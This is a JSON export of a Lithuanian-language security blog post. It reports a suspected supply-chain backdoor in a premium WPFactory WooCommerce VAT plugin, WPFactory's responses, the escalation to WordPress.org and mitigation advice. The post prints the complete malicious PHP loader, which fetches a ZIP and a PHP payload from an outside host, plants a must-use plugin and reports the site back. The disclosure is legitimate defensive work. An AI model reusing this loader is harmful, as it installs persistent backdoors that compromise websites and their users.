{"id":24971,"date":"2026-05-07T11:48:23","date_gmt":"2026-05-07T09:48:23","guid":{"rendered":"https:\/\/www.ferberenterprises.com\/?p=24971"},"modified":"2026-05-07T23:41:40","modified_gmt":"2026-05-07T21:41:40","slug":"security-breach-at-wpfactory-170000-wordpress-sites-exposed","status":"publish","type":"post","link":"https:\/\/www.ferberenterprises.com\/lt\/security-breach-at-wpfactory-170000-wordpress-sites-exposed\/","title":{"rendered":"Saugumo pa\u017eeidimas \u201eWPFactory\u201c: pavie\u0161inta 170 000 \u201eWordPress\u201c svetaini\u0173"},"content":{"rendered":"<p>\u201eWordPress\u201c i\u0161lieka pla\u010diausiai pasaulyje naudojama turinio valdymo sistema, palaikanti daugiau nei 40 procent\u0173 vis\u0173 interneto svetaini\u0173. Nuo ma\u017e\u0173 verslo svetaini\u0173 ir asmenini\u0173 tinklara\u0161\u010di\u0173 iki dideli\u0173 \u012fmoni\u0173 platform\u0173 ir el. komercijos infrastrukt\u016bros, \u0161i CMS tapo modernaus \u017einiatinklio pagrindu. Jos populiarumas atsiranda d\u0117l lankstumo, atviros ekosistemos ir did\u017eiulio prieinam\u0173 papildom\u0173j\u0173 moduli\u0173, skirt\u0173 jos funkcionalumui pl\u0117sti, skai\u010diaus.<\/p>\n\n\n\n<p>Ta\u010diau \u0161i pati ekosistema tapo ir vienu did\u017eiausi\u0173 \u2019WordPress\u201c saugumo i\u0161\u0161\u016bki\u0173.<\/p>\n\n\n\n<p>\u201eFerber Enterprises\u201c kibernetinio saugumo komanda nuolat stebi gr\u0117smes, kylan\u010dias \u201eWordPress\u201c ekosistemai, nes \u012fskiepi\u0173, \u0161ablon\u0173 ar tiekimo grandini\u0173 pa\u017eeid\u017eiamumai gali greitai peraugti \u012f didelio masto saugumo pa\u017eeidimus, paveikian\u010dius t\u016bkstan\u010dius svetaini\u0173 visame pasaulyje. Pastaraisiais metais \u012fsilau\u017e\u0117liai vis da\u017eniau taiko \u012fskiepi\u0173 k\u016br\u0117jus ir platinimo infrastrukt\u016br\u0105, o ne atskiras svetaines, tod\u0117l kenk\u0117ji\u0161kas kodas gali plisti per patikimus programin\u0117s \u012frangos atnaujinimus ir oficialius atsisiuntimo kanalus.<\/p>\n\n\n\n<p>\u0160i\u0105 savait\u0119 kilo didelis skandalas, susij\u0119s su \u201eWPFactory\u201c \u2013 \u017einomu \u201eWordPress\u201c \u012fskiepi\u0173 k\u016br\u0117ju, kurio produktai yra \u012fdiegti daugiau nei 170 000 svetaini\u0173 visame pasaulyje. Daugiau nei 80 su \u0161ia \u012fmone susijusi\u0173 \u012fskiepi\u0173 buvo laikinai u\u017eblokuoti \u201eWordPress.org\u201c svetain\u0117je, kai m\u016bs\u0173 \u201eFerber Enterprises\u201c kibernetinio saugumo komanda vieno i\u0161 jos \u012fskiepi\u0173 mokamoje versijoje aptiko \u012ftariam\u0105 \u201ebackdoor\u201c program\u0105.<\/p>\n\n\n\n<p>\u0160is incidentas suk\u0117l\u0117 didel\u012f susir\u016bpinim\u0105 visoje \u201eWordPress\u201c bendruomen\u0117je d\u0117l programin\u0117s \u012frangos tiekimo grandin\u0117s saugumo, papildini\u0173 per\u017ei\u016bros proces\u0173 ir vis labiau sud\u0117ting\u0117jan\u010di\u0173 atak\u0173 prie\u0161 atvirojo kodo ekosistem\u0105.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Ne\u012fprasto papildinio elgesio atradimas<\/h2>\n\n\n\n<p>\u0160i problema pirm\u0105 kart\u0105 paai\u0161k\u0117jo, kai m\u016bs\u0173 kibernetinio saugumo komanda \u201eFerber Enterprises\u201c pasteb\u0117jo ne\u012fprast\u0105 elges\u012f, bandydama \u201eEU VAT for WooCommerce Pro\u201c \u012fskiepio \u201epremium\u201c versij\u0105, kuri platinama tiesiogiai i\u0161 oficialios svetain\u0117s.<\/p>\n\n\n\n<p>Pradinis tyrimas prasid\u0117jo po to, kai \u012fdiegiant papildin\u012f atsirado kritin\u0117 klaida. Trikd\u017ei\u0173 \u0161alinimo metu m\u016bs\u0173 analitikai aptiko \u012ftartin\u0105 PHP fail\u0105, pavadint\u0105 class-alg-wc-eu-vat-customer.php. Atrod\u0117, kad failas vykd\u0117 visi\u0161kai nesuderinam\u0105 su numatyta \u201eWooCommerce VAT\u201c papildinio funkcionalumu veikl\u0105.<\/p>\n\n\n\n<link rel=\"stylesheet\"\nhref=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/styles\/vs2015.min.css\">\n\n<script src=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/highlight.min.js\"><\/script>\n\n<script>\ndocument.addEventListener(\"DOMContentLoaded\", () => {\n    hljs.highlightAll();\n});\n<\/script>\n\n<span data-no-translation=\"\">\n\n<div style=\"    margin:30px 0;    border-radius:12px;    overflow:hidden;    box-shadow:0 0 25px rgba(0,0,0,0.35);    border:1px solid #2d2d2d;\">\n\n<div style=\"    background:#111;    color:#aaa;    padding:12px 18px;    font-family:monospace;    font-size:14px;    border-bottom:1px solid #2d2d2d;    display:flex;    justify-content:space-between;    align-items:center;\">\n    <span>class-alg-wc-eu-vat-customer.php<\/span>\n    <span style=\"color:#ff5f56;\">\u25cf<\/span>\n<\/div>\n\n<pre style=\"    margin:0;    padding:25px;    background:#1e1e1e;    overflow:auto;    font-size:14px;    line-height:1.6;\"><code class=\"language-php\">&lt;?php\nrequire_once dirname(__FILE__, 5) . '\/wp-load.php';\n$h = strtolower(preg_replace('\/:\\d+$\/', '', $_SERVER&#91;'HTTP_HOST'] ?? ''));\n$s = (!empty($_SERVER&#91;'HTTPS']) &amp;&amp; $_SERVER&#91;'HTTPS'] !== 'off') ? 'https' : 'http';\n$ch = curl_init(\"$s:\/\/$h\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/eu-vat-for-woocommerce-pro.php\");\ncurl_setopt_array($ch, &#91;\n    CURLOPT_NOBODY =&gt; 1,\n    CURLOPT_RETURNTRANSFER =&gt; 1,\n    CURLOPT_TIMEOUT =&gt; 10,\n    CURLOPT_SSL_VERIFYPEER =&gt; 0\n]);\ncurl_exec($ch);\n$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\ncurl_close($ch);\nif ($code !== 403 || ($_GET&#91;'scaramooch'] ?? '') === 'refresh') {\n    $url = 'https:\/\/foodylicious.co.uk\/change\/akismet-pro.zip';\n    $zipPath = sys_get_temp_dir() . '\/plugin.zip';\n    $zipData = file_get_contents($url);\n    if ($zipData === false) {\n        exit('Download failed');\n    }\n    file_put_contents($zipPath, $zipData);\n    $zip = new ZipArchive;\n    if ($zip-&gt;open($zipPath) === TRUE) {\n        $zip-&gt;extractTo(dirname(__FILE__, 5) . '\/wp-content\/plugins\/');\n        $zip-&gt;close();\n    } else {\n        exit('ZIP open failed');\n    }\n    unlink($zipPath);\n} else {\n    $url = \"https:\/\/foodylicious.co.uk\/change\/scara.php\";\n    $code = file_get_contents($url);\n    if ($code !== false) {\n\n        $baseDir = dirname(__FILE__, 4);\n\n        $folderName = 'mu-plugins';\n\n        $dir = $baseDir . '\/' . $folderName;\n\n        if (!is_dir($dir)) {\n            mkdir($dir, 0755, true);\n        }\n\n        file_put_contents($dir . '\/wp-redis.php', $code);\n    }\n}\n$data = &#91;\n    'site_url' =&gt; get_site_url() . '\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/',\n];\nwp_remote_post('https:\/\/foodylicious.co.uk\/change\/tracks.php', &#91;\n    'body' =&gt; $data,\n    'timeout' =&gt; 10,\n]);<\/code><\/pre><\/div><\/span>\n\n\n\n<p>Pagal m\u016bs\u0173 analiz\u0119, kodas band\u0117:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Atsisi\u0173sti i\u0161orin\u012f ZIP archyv\u0105 i\u0161 nutolusio serverio<\/li>\n\n\n\n<li>Modifikuoti \u201eWordPress\u201c pagrindinius katalogus<\/li>\n\n\n\n<li>Bendrauti su i\u0161orine infrastrukt\u016bra<\/li>\n\n\n\n<li>Galimai vykdyti nuotolines programas paveiktose svetain\u0117se<\/li>\n<\/ul>\n\n\n\n<p>\u0160ie rodikliai nedelsiant leido manyti galim\u0105 pasl\u0117pt\u0173 \u012fsilau\u017eimo ang\u0173 arba kenk\u0117ji\u0161kos tiekimo grandin\u0117s kompromitavimo buvim\u0105.<\/p>\n\n\n\n<p>Ypa\u010d nerim\u0105 k\u0117l\u0117 tai, kad \u0161is papildinys nebuvo atsisi\u0173stas i\u0161 neoficialaus veidrodinio serverio ar nelegalaus archyvo. Paketas buvo atsisi\u0173stas tiesiogiai i\u0161 oficialaus \u201eWPFactory\u201c klient\u0173 portalo, o tai sustiprino nuog\u0105stavimus, kad galb\u016bt buvo \u012fsilau\u017eta \u012f pat\u012f platinimo kanal\u0105.<\/p>\n\n\n\n<p>\u201eFerber Enterprises\u201c komanda nedelsdama u\u017efiksavo \u0161\u012f incident\u0105 ir prad\u0117jo atsakingo prane\u0161imo proces\u0105, tiesiogiai susisiekdama su \u201eWPFactory\u201c per \u201eGitHub\u201c.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b8b3baa1\"><h2 class=\"uagb-heading-text\">Pirminis atsakymas i\u0161 WPFactory<\/h2><\/div>\n\n\n\n<p>\u201eWPFactory\u201c i\u0161 prad\u017ei\u0173 atsak\u0117, kad ataskaitoje apra\u0161ytas \u012ftartinas failas ir elgsena nepriklauso j\u0173 oficialiai kod\u0173 bazei.<\/p>\n\n\n\n<p>Bendrov\u0117s atstovas pasi\u016bl\u0117 kelis alternatyvius paai\u0161kinimus, \u012fskaitant:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Modifikuota vietin\u0117 instaliacija<\/li>\n\n\n\n<li>Sugadinta svetain\u0117s aplinka<\/li>\n\n\n\n<li>Pasenusi papildinio versija<\/li>\n\n\n\n<li>Potencialiai suklastotas atsisiuntimo \u0161altinis<\/li>\n<\/ul>\n\n\n\n<p>Bendrov\u0117 taip pat parei\u0161k\u0117, kad negal\u0117jo saugiai patikrinti pateikto ZIP formato failo, nes j\u0173 nar\u0161ykl\u0117 archyv\u0105 pa\u017eym\u0117jo kaip galimai nesaug\u0173.<\/p>\n\n\n\n<p>V\u0117liau m\u016bs\u0173 kibernetinio saugumo komanda paai\u0161kino, kad \u0161is papildinys buvo atsisi\u0173stas tiesiai i\u0161 oficialios \u201eWPFactory\u201c svetain\u0117s ir kad \u012ftartinas failas i\u0161liko net ir atsisiuntus nauj\u0105 4.6.1 versijos kopij\u0105 i\u0161 to paties \u0161altinio.<\/p>\n\n\n\n<p>\u0160i aplinkyb\u0117 tapo pagrindine tyrimo dalimi. Jei keliuose nepriklausomai vienas nuo kito atsisi\u0173stuose failuose i\u0161 oficialaus platinimo kanalo nuolat buvo randamas tas pats \u012ftartinas kodas, tikimyb\u0117, kad buvo \u012fsilau\u017eta \u012f vietin\u0119 svetain\u0119, tapo vis ma\u017eesn\u0117. Nepaisant \u0161i\u0173 i\u0161vad\u0173, \u201eWPFactory\u201c i\u0161 prad\u017ei\u0173 teig\u0117, kad jiems nepavyko atkurti \u0161ios problemos savo pus\u0117je, ir tvirtino, kad oficialiame \u012fskiepio pakete \u012ftartino failo nebuvo.<\/p>\n\n\n\n<p>Tuomet \u012fmon\u0117 papra\u0161\u0117 suteikti administratoriaus teises ir FTP prieig\u0105 prie paveiktos aplinkos, kad gal\u0117t\u0173 t\u0119sti tyrim\u0105. \u201eFerber Enterprises\u201c \u0161\u012f pra\u0161ym\u0105 atmet\u0117me d\u0117l kibernetinio saugumo prie\u017eas\u010di\u0173. Privilegijuotos prieigos prie serverio suteikimas tiek\u0117jui, kurio infrastrukt\u016bra pati gal\u0117jo b\u016bti pa\u017eeista, b\u016bt\u0173 suk\u0117l\u0119s nepriimtin\u0105 saugumo rizik\u0105. Vietoj to m\u016bs\u0173 komanda toliau teik\u0117 techninius \u012frodymus, \u012fskaitant vaizdo \u012fra\u0161\u0105, kuriame matyti \u012ftartinas \u012fskiepio veikimas i\u0161kart po jo \u012fdiegimo.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b43078c2\"><h2 class=\"uagb-heading-text\">Perk\u0117limas \u012f WordPress.org<\/h2><\/div>\n\n\n\n<p>Tyrimui progresuojant, did\u0117jo susir\u016bpinimas d\u0117l galimo problemos masto. \u201eWPFactory\u201c valdo didel\u012f \u012fskiepi\u0173 asortiment\u0105, kur\u012f sudaro daugiau nei 65 \u012fskiepiai, kuri\u0173 bendras aktyvi\u0173 \u012fdiegim\u0173 skai\u010dius vir\u0161ija 170 000. Tod\u0117l bet koks \u012fsilau\u017eimas, paveik\u0119s bendrov\u0117s platinimo infrastrukt\u016br\u0105, gal\u0117t\u0173 tur\u0117ti pla\u010dias pasekmes visoje \u201eWordPress\u201c ekosistemoje.<\/p>\n\n\n\n<p>M\u016bs\u0173 komanda \u0161i\u0105 problem\u0105 perdav\u0117 tiesiogiai \u201eWordPress.org\u201c, siekdama u\u017ekirsti keli\u0105 kitiems vartotojams \u012fdiegti galimai u\u017ekr\u0117stus paketus, kol tebevyksta tyrimas. V\u0117liau \u201eWordPress.org\u201c \u0117m\u0117si i\u0161skirtini\u0173 priemoni\u0173 ir laikinai pa\u0161alino daugiau nei 80 \u201eWPFactory\u201c \u012fskiepi\u0173 i\u0161 oficialaus archyvo.<\/p>\n\n\n\n<p>\u0160is \u017eingsnis i\u0161 karto pritrauk\u0117 visos \u201eWordPress\u201c saugumo bendruomen\u0117s d\u0117mes\u012f, nes tokio masto masinis \u012fskiepi\u0173 u\u017edarymas yra gana retas rei\u0161kinys ir paprastai rodo rimtas nei\u0161spr\u0119stas problemas. Situacijai paa\u0161tr\u0117jus, \u201eWPFactory\u201c v\u0117liau pripa\u017eino, kad problema pasirod\u0117 esanti reali, ir atsipra\u0161\u0117 u\u017e tai, kad nereagavo grei\u010diau \u012f pirmin\u012f prane\u0161im\u0105. Bendrov\u0117s atstovai parei\u0161k\u0117, kad jie aktyviai tiria \u0161\u012f klausim\u0105 ir stengiasi j\u012f i\u0161spr\u0119sti. Viena i\u0161 \u201eWPFactory\u201c viduje i\u0161kelt\u0173 hipotezi\u0173 buvo ta, kad per j\u0173 infrastrukt\u016br\u0105 gal\u0117jo b\u016bti nety\u010dia pateiktas pasen\u0119s arba \u012f talpykl\u0105 \u012fra\u0161ytas \u012fskiepio paketas.<\/p>\n\n\n\n<p>Ta\u010diau m\u016bs\u0173 kibernetinio saugumo komanda nesutiko su \u0161iuo vertinimu. Stebimas elgesys ai\u0161kiai rod\u0117 rimtesn\u0119 saugumo problem\u0105, galimai susijusi\u0105 su pa\u017eeistomis k\u016brimo sistemomis, platinimo sistemomis arba neteis\u0117tu kod\u0173 \u012fterpimu \u012f atsisiun\u010diamus papildini\u0173 archyvus.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Kod\u0117l \u0161is incidentas svarbus<\/h2>\n\n\n\n<p>\u201eWPFactory\u201c skandalas atkreipia d\u0117mes\u012f \u012f did\u0117jan\u010di\u0105 kibernetinio saugumo gr\u0117sm\u0119, \u017einom\u0105 kaip programin\u0117s \u012frangos tiekimo grandin\u0117s ataka. Anks\u010diau \u012fsilau\u017e\u0117liai da\u017eniausiai siekdavo tiesiogiai u\u017egrobti atskiras svetaines, naudodami j\u0117gos metod\u0105 arba i\u0161naudodami \u012fskiepi\u0173 pa\u017eeid\u017eiamumus. \u0160iandien kibernetiniai nusikalt\u0117liai vis da\u017eniau taiko savo i\u0161puolius pa\u010diams programin\u0117s \u012frangos tiek\u0117jams, nes u\u017egrobus patikim\u0105 tiek\u0117j\u0105, kenk\u0117ji\u0161kas kodas gali i\u0161plisti t\u016bkstan\u010diams svetaini\u0173 vienu metu.<\/p>\n\n\n\n<p>\u0160i strategija jau buvo pasteb\u0117ta keliuose garsiuose kibernetinio saugumo incidentuose, turin\u010diuose \u012ftakos pasaulinei programin\u0117s \u012frangos ekosistemai per pastar\u0105j\u012f de\u0161imtmet\u012f. Konkre\u010diai \u201eWordPress\u201c ekosistemoje papildini\u0173 k\u016br\u0117jai yra patraukl\u016bs taikiniai, nes administratoriai i\u0161 esm\u0117s pasitiki papildiniais, o \u0161ie da\u017enai veikia su padidintomis teis\u0117mis.<\/p>\n\n\n\n<p>Jei \u012f per oficial\u0173 kanal\u0105 platinam\u0105 \u012fskiepio paket\u0105 \u012fterpiamas kenk\u0117ji\u0161kas kodas, paveiktos svetain\u0117s gali pa\u010dios, to ne\u017einodamos, \u012fdiegti kenk\u0117ji\u0161k\u0105 programin\u0119 \u012frang\u0105. \u012etartino \u012fskiepio \u201eWPFactory\u201c atveju galimos pasekm\u0117s yra rimtos.<\/p>\n\n\n\n<p>Remiantis m\u016bs\u0173 analize, nustatytas elgesys teori\u0161kai leist\u0173 atakuotojams:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u012ediekti papildom\u0173 kenk\u0117ji\u0161k\u0173 program\u0173<\/li>\n\n\n\n<li>\u012eterpti SEO \u0161lam\u0161t\u0105<\/li>\n\n\n\n<li>Sukurkite nuolatines u\u017enugarius<\/li>\n\n\n\n<li>Ekstrahuoti neskelbtinus duomenis<\/li>\n\n\n\n<li>Modifikuoti WordPress diegimus nuotoliniu b\u016bdu<\/li>\n\n\n\n<li>I\u0161laikyti neteis\u0117t\u0105 prieig\u0105 ilg\u0105 laik\u0105<\/li>\n<\/ul>\n\n\n\n<p>Toki\u0173 atak\u0173 pavojus slypi j\u0173 slaptume. \u0160iuolaikin\u0117s u\u017ekardos da\u017enai kuriamos taip, kad jos likt\u0173 nenaudojamos kelis m\u0117nesius, prie\u0161 aktyvuojant, tod\u0117l jas aptikti tampa \u017eymiai sunkiau. \u0160\u012f m\u0117nes\u012f \u201eWordPress Plugins Team\u201c prane\u0161\u0117 u\u017edariusi daugiau nei 30 papildini\u0173, kai kitame papildini\u0173 portfelyje pasl\u0117ptas kenk\u0117ji\u0161kas kodas liko neaktyvus a\u0161tuonis m\u0117nesius, kol galiausiai aktyvavosi ir \u012f svetaines \u012fterp\u0117 SEO \u0161lam\u0161t\u0105.<\/p>\n\n\n\n<p>\u0160i tendencija rodo, kaip atakuotojai vis labiau prioritet\u0105 teikia atkaklumui ir u\u017edelstam aktyvavimui, siekdami i\u0161vengti aptikimo mechanizm\u0173.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-c956d27d\"><h2 class=\"uagb-heading-text\">Platesn\u0117 saugumo kriz\u0117 \u201eWordPress\u201c ekosistemoje<\/h2><\/div>\n\n\n\n<p>WPFactory incidentas taip pat atskleid\u017eia platesnio masto sistemines saugumo problemas, turin\u010dias \u012ftakos visai \u201eWordPress\u201c platformai. Per pastar\u0105j\u012f de\u0161imtmet\u012f \u012fskiepi\u0173 ekosistema smarkiai i\u0161sipl\u0117t\u0117 \u2013 tiek oficialiose, tiek komercin\u0117se parduotuv\u0117se dabar galima rasti de\u0161imtis t\u016bkstan\u010di\u0173 \u012fskiepi\u0173. Nors \u0161i ekosistema skatina naujoves ir lankstum\u0105, ji taip pat smarkiai apsunkina saugumo prie\u017ei\u016br\u0105.<\/p>\n\n\n\n<p>Remiantis \u201cPatchstack\u201d ataskaita \u201eWordPress saugumo b\u016bkl\u0117 2026 m.\u201c, beveik 461 t\u016bkst. \u017einom\u0173 pa\u017eeid\u017eiamum\u0173 nebuvo i\u0161taisyta iki j\u0173 vie\u0161o paskelbimo. \u0160is statistinis rodiklis atspindi did\u0117jan\u010di\u0105 na\u0161t\u0105, tenkan\u010di\u0105 \u012fskiepi\u0173 k\u016br\u0117jams, saugumo tyr\u0117jams ir saugykl\u0173 tvarkytojams.<\/p>\n\n\n\n<p>Tuo pat metu, oficialus \u201eWordPress\u201c papildini\u0173 per\u017ei\u016bros procesas, kaip prane\u0161ama, dabar vir\u0161ija 4000 papildini\u0173, laukian\u010di\u0173 per\u017ei\u016bros. Tokie skai\u010diai iliustruoja did\u017eiul\u012f i\u0161\u0161\u016bk\u012f u\u017etikrinant kokyb\u0117s kontrol\u0119 ir saugumo audit\u0105 dideliu mastu.<\/p>\n\n\n\n<p>Daugelis \u012fskiepi\u0173 k\u016br\u0117j\u0173 yra nedidel\u0117s komandos, turin\u010dios ribotus saugumo i\u0161teklius. Kiti tuo pa\u010diu metu valdo de\u0161imtis \u012fskiepi\u0173, \u012fgyvendindami agresyvias komercines pl\u0117tros strategijas, apiman\u010dias \u012fmoni\u0173 \u012fsigijimus ir produkt\u0173 asortimento pl\u0117tr\u0105. Pati \u201eWPFactory\u201c neseniai i\u0161sipl\u0117t\u0117 per \u012fsigijimus, \u012fskaitant \u201eExtend-WP\u201c ir jos 19 \u012fskiepi\u0173 \u012fsigijim\u0105 2025 m., o v\u0117liau tais pa\u010diais metais \u2013 \u201eWBW\u201c ir keleto kit\u0173 \u012fskiepi\u0173 \u012fsigijim\u0105.<\/p>\n\n\n\n<p>Spartus portfelio pl\u0117tra gali sukelti operacin\u012f sud\u0117tingum\u0105, apsunkinant\u012f kodo auditavim\u0105, infrastrukt\u016bros valdym\u0105 ir leidim\u0173 vientisumo patikrinim\u0105. Atakuotojai puikiai \u017eino \u0161ias realijas. Vis da\u017eniau jie sutelkia d\u0117mes\u012f \u012f silpn\u0173 operacinio saugumo praktik\u0173, kurias naudoja programin\u0117s \u012frangos tiek\u0117jai, i\u0161naudojim\u0105, o ne tiesiogin\u012f galutini\u0173 vartotoj\u0173 taikym\u0105si.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Auganti tiekimo grandin\u0117s saugumo svarba<\/h2>\n\n\n\n<p>Tokie incidentai sustiprina b\u016btinyb\u0119 visoje \u201eWordPress\u201c ekosistemoje taikyti grie\u017etesnes tiekimo grandin\u0117s saugos praktikas.<\/p>\n\n\n\n<p>\u201eFerber Enterprises\u201c kibernetinio saugumo komanda primygtinai rekomenduoja \u012fskiepi\u0173 k\u016br\u0117jams \u012fdiegti kelet\u0105 pagrindini\u0173 apsaugos priemoni\u0173, tarp kuri\u0173:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Kriptografinis paket\u0173 pasira\u0161ymas<\/li>\n\n\n\n<li>Saugi CI\/CD sistem\u0173 eilut\u0117<\/li>\n\n\n\n<li>Privalomas keli\u0173 veiksni\u0173 autentifikavimas<\/li>\n\n\n\n<li>Infrastrukt\u016bros segmentavimas<\/li>\n\n\n\n<li>Nuolatinis vientisumo steb\u0117jimas<\/li>\n\n\n\n<li>Nepriklausomos kod\u0173 auditas<\/li>\n\n\n\n<li>Reproducible build systems<\/li>\n<\/ul>\n\n\n\n<p>Svetaini\u0173 administratoriai taip pat tur\u0117t\u0173 stiprinti savo saugumo paj\u0117gumus. Net ir i\u0161 oficiali\u0173 ar patikim\u0173 \u0161altini\u0173 atsisiun\u010diam\u0173 papildini\u0173 negalima laikyti savaime saugi\u0173.<\/p>\n\n\n\n<p>Organizacijos, valdan\u010dios kritin\u0117s svarbos \u201eWordPress\u201c infrastrukt\u016br\u0105, tur\u0117t\u0173 atsi\u017evelgti \u012f:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Staging aplink\u0173 palaikymas<\/li>\n\n\n\n<li>I\u0161einan\u010dio srauto steb\u0117jimas<\/li>\n\n\n\n<li>Skelbiami pl\u0117tiniai prie\u0161 diegim\u0105<\/li>\n\n\n\n<li>Ribojamas papildini\u0173 naudojimas<\/li>\n\n\n\n<li>Taikant ma\u017eiausi\u0173 privilegij\u0173 prieigos valdiklius<\/li>\n\n\n\n<li>Fail\u0173 vientisumo steb\u0117jimo diegimas<\/li>\n\n\n\n<li>Naudodami valdomas interneto program\u0173 ugniasienes (WAF)<\/li>\n<\/ul>\n\n\n\n<p>\u012emoni\u0173 aplinkoje tiekimo grandin\u0117s validavimas tampa toks pat svarbus kaip ir tradicinis pa\u017eeid\u017eiamumo valdymas. Prielaida, kad oficial\u016bs programin\u0117s \u012frangos kanalai visada yra saug\u016bs, \u0161iuolaikin\u0117je gr\u0117smi\u0173 aplinkoje nebeatrodo reali.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Bendruomen\u0117s reakcijos ir tebesit\u0119siantis tyrimas<\/h2>\n\n\n\n<p>Gin\u010dai greitai pasklido visoje \u201eWordPress\u201c bendruomen\u0117je, kai k\u016br\u0117jai, saugumo tyr\u0117jai ir infrastrukt\u016bros paslaug\u0173 teik\u0117jai \u0117m\u0117 vie\u0161ai aptarin\u0117ti \u0161i\u0105 problem\u0105.<\/p>\n\n\n\n<p>Keli gerai \u017einomi ekosistemos atstovai padidino informuotum\u0105 apie situacij\u0105, \u012fskaitant k\u016br\u0117jus, kurie paskelb\u0117 laikinai u\u017edaryt\u0173 papildini\u0173 s\u0105ra\u0161us ir paragino administratorius audituoti savo aplinkas.<\/p>\n\n\n\n<p>Tuo tarpu m\u016bs\u0173 komanda \u201eFerber Enterprises\u201c toliau analizuoja \u012ftartinus \u012fskiepi\u0173 pavyzd\u017eius ir stebi, ar neatsiranda nauj\u0173 \u012fsilau\u017eimo po\u017eymi\u0173, kurie gal\u0117t\u0173 tur\u0117ti \u012ftakos \u201eWordPress\u201c svetain\u0117ms visame pasaulyje.<\/p>\n\n\n\n<p>\u0160io straipsnio paskelbimo metu bendrov\u0117 \u201eWPFactory\u201c patvirtino \u0161i\u0105 problem\u0105 ir parei\u0161k\u0117, kad aktyviai dirba siekdama j\u0105 i\u0161spr\u0119sti.<\/p>\n\n\n\n<p>Ta\u010diau daug klausim\u0173 lieka neatsakyt\u0173:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Ar buvo pa\u017eeista oficiali platinimo infrastrukt\u016bra?<\/li>\n\n\n\n<li>Kiek laiko potencialiai buvo platinami kenk\u0117ji\u0161ki paketai?<\/li>\n\n\n\n<li>Ar buvo paveikti papildomi \u012fskiepiai?<\/li>\n\n\n\n<li>Ar buvo pa\u017eeistos klient\u0173 s\u0105skaitos ar parsisiuntimo sistemos?<\/li>\n\n\n\n<li>Ar atakuotojai gavo nuolatin\u0119 prieig\u0105 prie vidin\u0117s infrastrukt\u016bros?<\/li>\n\n\n\n<li>Ar vis dar gali egzistuoti papildomos neveikian\u010dios naudingosios apkrovos?<\/li>\n<\/ul>\n\n\n\n<p>Kol \u0161ie klausimai nebus visi\u0161kai i\u0161spr\u0119sti, i\u0161liks b\u016btinyb\u0117 elgtis atsargiai.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">WordPress saugumo ateitis<\/h2>\n\n\n\n<p>WPFactory incidentas galiausiai gali tapti dar vienu i\u0161kalbingu pavyzd\u017eiu, iliustruojan\u010diu kibernetinio saugumo i\u0161\u0161\u016bkius, su kuriais susiduria atvirojo kodo interneto ekosistema.<\/p>\n\n\n\n<p>WordPress valdo did\u017eiul\u0119 pasaulin\u0117s interneto ekonomikos dal\u012f. Tod\u0117l bet koks didelio masto kompromisas, paveikiantis program\u0173 k\u016br\u0117jus, gali tur\u0117ti pasekmi\u0173, besit\u0119sian\u010di\u0173 gerokai toliau nei pavien\u0117s svetain\u0117s.<\/p>\n\n\n\n<p>Kadangi \u012fsilau\u017e\u0117liai vis da\u017eniau naudoja tiekimo grandin\u0117s pa\u017eeidimus ir slaptas i\u0161likimo technikas, \u012fskiepi\u0173 saugumas nebegali b\u016bti laikomas antraeiliu klausimu. \u201eFerber Enterprises\u201c manome, kad \u0161is \u012fvykis yra svarbus priminimas, jog kibernetinis saugumas apima ne tik pa\u010di\u0173 svetaini\u0173 apsaug\u0105, bet ir kiekvieno programin\u0117s \u012frangos platinimo grandin\u0117s lygmens saugum\u0105.<\/p>\n\n\n\n<p>Pasitik\u0117jimas atviromis ekosistemomis priklauso nuo skaidrumo, greito reagavimo \u012f incidentus ir tvirt\u0173 operacinio saugumo praktik\u0173. \u201eWordPress\u201c ekosistema dabar susid\u016br\u0117 su svarbiu momentu.<\/p>\n\n\n\n<p>Tai, kaip k\u016br\u0117jai, saugykl\u0173 pri\u017ei\u016br\u0117tojai, prieglobos paslaug\u0173 teik\u0117jai ir saugos komandos reaguos \u012f tokius incidentus, pad\u0117s nustatyti, ar \u201eWordPress\u201c gal\u0117s ir toliau i\u0161laikyti milijon\u0173 kasdien juo pasitikin\u010di\u0173 \u012fmoni\u0173 ir organizacij\u0173 pasitik\u0117jim\u0105.<\/p>","protected":false},"excerpt":{"rendered":"<p>WordPress remains the most widely used content management system in the world, powering more than 40 percents of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":24973,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"set","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center 